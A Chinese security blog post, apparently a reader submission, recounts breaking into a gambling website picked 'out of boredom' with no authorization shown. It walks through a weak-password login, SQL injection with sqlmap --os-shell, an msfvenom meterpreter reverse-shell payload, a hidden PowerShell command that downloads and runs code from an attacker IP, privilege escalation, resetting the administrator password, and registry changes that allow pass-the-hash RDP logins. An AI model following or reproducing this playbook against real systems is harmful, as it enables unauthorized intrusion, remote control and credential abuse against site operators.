实战！记一次对某菠菜的简单测试

admin

103266
文章

87
评论

2023年5月15日02:31:56评论57 views字数 1731阅读5分46秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送，建议大家把潇湘信安“设为星标”，否则可能看不到了！

这篇文章由群友@dddd原创投稿，虽然是些科普型常规手法，但还是感谢师傅的分享。

0x00 前言

闲着无聊，网上找了一个菠菜进行简单测试，并做记录，大佬们轻喷。

0x01 弱口令

访问网站就是一个登录页面，试试简单的弱口令admin/123456，直接进入后台。

0x02 SQL注入

翻看了很多功能点，在一处功能点发现上传接口，并尝试上传文件，发现无法上传，加了白名单。

直接选择放弃，继续寻找，在某一个url参数上加上单引号，直接报错，SQL注入这不就来了么。

http://xxxxxx/xxxxx/GroupMember.aspx?gid=150198

说干就干，直接SQLMAP。

发现为MSSQL，且DBA权限，直接--os-shell

0x03 上线MSF

msf生成powershell脚本，并放置在网站目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

Vps开启监听

直接powershell上线session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通过url拼接堆叠执行powershell会存在一个问题，就是单引号闭合问题；我们可以通过对powershell进行编码一下，这样就可以绕过单引号的问题。

下面推荐一个不错的网站：

https://r0yanx.com/tools/java_exec_encode/

0x04 提权

直接getsystem获取system权限；如果需要提权推荐土豆家族提权，实战中成功率很高，影响的服务器版本也很多。

迁移一下进程，防止进程掉线。

0x05 远程登录服务器

发现服务器开启3389端口，因为是system权限，且为2012系统，大于2008版本都是无法抓到明文密码，直接修改adminnistrator密码。

已经成功登录进服务器，但在实战中不推荐直接修改管理员密码。

0x06 通过hash远程登录管理员账号

因为是win2012无法获取明文密码，直接修改管理员密码稍有些不妥；我们也可以尝试通过获取管理员NTLM远程登录机器。

与测试目标并非同一台，这只是提供一个思路！

如果使用hash远程登录RDP，需要开启"Restricted Admin Mode"

//开启Restricted Admin modeREG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
//查看是否已开启0x0则表示开启REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"